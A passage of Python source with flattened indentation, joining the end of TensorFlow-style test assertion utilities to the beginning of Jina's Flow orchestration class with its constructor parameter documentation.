err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts.
Args:
      a: The expected numpy ndarray (or anything that can be converted to one),
        or dict of same. Must be a dict iff `b` is a dict.
      b: The actual numpy ndarray (or anything that can be converted to one),
        or dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
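  # Hedged usage sketch: with float16 inputs the effective tolerances widen to
  # the half_* defaults (1e-3), so the comparison below passes even though it
  # would fail under the default 1e-6 tolerances.
  #
  #   a = np.array([1.0], dtype=np.float16)
  #   b = np.array([1.0005], dtype=np.float16)
  #   self.assertAllCloseAccordingToType(a, b)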
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
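  # Hedged usage sketch (op and message are hypothetical): the argument may be
  # a regular expression matched against the error message (and op stack), or
  # a predicate taking the exception and returning True/False.
  #
  #   with self.assertRaisesOpError("negative input not supported"):
  #     MyOperator(invalid_input).eval()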
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
base.py
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
Optional,
Union,
Tuple,
List,
Set,
Dict,
overload,
Type,
TYPE_CHECKING,
)
from jina.orchestrate.flow.builder import allowed_levels, _hanging_pods
from jina import __default_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import FlowTopologyError, FlowMissingPodError, RuntimeFailToStart
from jina.helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from jina.parsers.flow import set_flow_parser
from jina.orchestrate.pods import Pod
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.serve.executors import BaseExecutor
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
results_as_docarray: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param results_as_docarray: If set, return results as DocArray instead of Request.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
pods_addresses: Optional[str] = '{}',
polling: Optional[str] = 'ANY',
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
          it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
        :param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
        :param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
        :param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param pods_addresses: dictionary JSON with the input addresses of each Pod
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
        :param py_modules: The customized Python modules that need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
          When used under Python, one can additionally use the following values:
          - a Python dict that represents the config
          - a text file stream that has a `.read()` interface
        :param uses_after_address: The address of the uses-after runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
        :param inspect: The strategy for the inspect Pods in the Flow.
            If `REMOVE` is given then all inspect Pods are removed when building the Flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.parsers.flow import set_flow_parser
from jina.helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
                        'the input/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
pod_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.pods_addresses = json.dumps(pod_addresses)
self._pod_nodes[GATEWAY_NAME] = Pod(args, needs)
def _get_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port_in}']
return graph_dict
def _get_k8s_pod_addresses(self, k8s_namespace: str) -> Dict[str, List[str]]:
graph_dict = {}
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
graph_dict[node] = [
f'{pod_k8s_address}:{K8sGrpcConnectionPool.K8S_PORT_IN}'
]
return graph_dict
def _get_docker_compose_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.pods.config.docker_compose import PORT_IN
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_docker_compose_address = (
f'{to_compatible_name(v.head_args.name)}:{PORT_IN}'
)
graph_dict[node] = [pod_docker_compose_address]
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same pod
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._pod_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_pod = self.last_pod
if last_pod != 'gateway':
graph_dict[last_pod].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
        Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging Peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
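    # Hedged usage sketch (executor names are illustrative): two parallel
    # branches joined back together, either explicitly via `needs` or by
    # collecting every hanging Pod with `needs_all`.
    #
    #   f = (
    #       Flow()
    #       .add(name='p1')
    #       .add(name='p2', needs='gateway')
    #       .needs(['p1', 'p2'], name='joiner')
    #   )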
# overload_inject_start_pod
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
        :param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
        :param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
        :param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
        :param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context managed by the Flow.
        :param force_update: If set, always pull the latest Hub Executor bundle even if it exists locally
        :param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
            - To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
        :param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
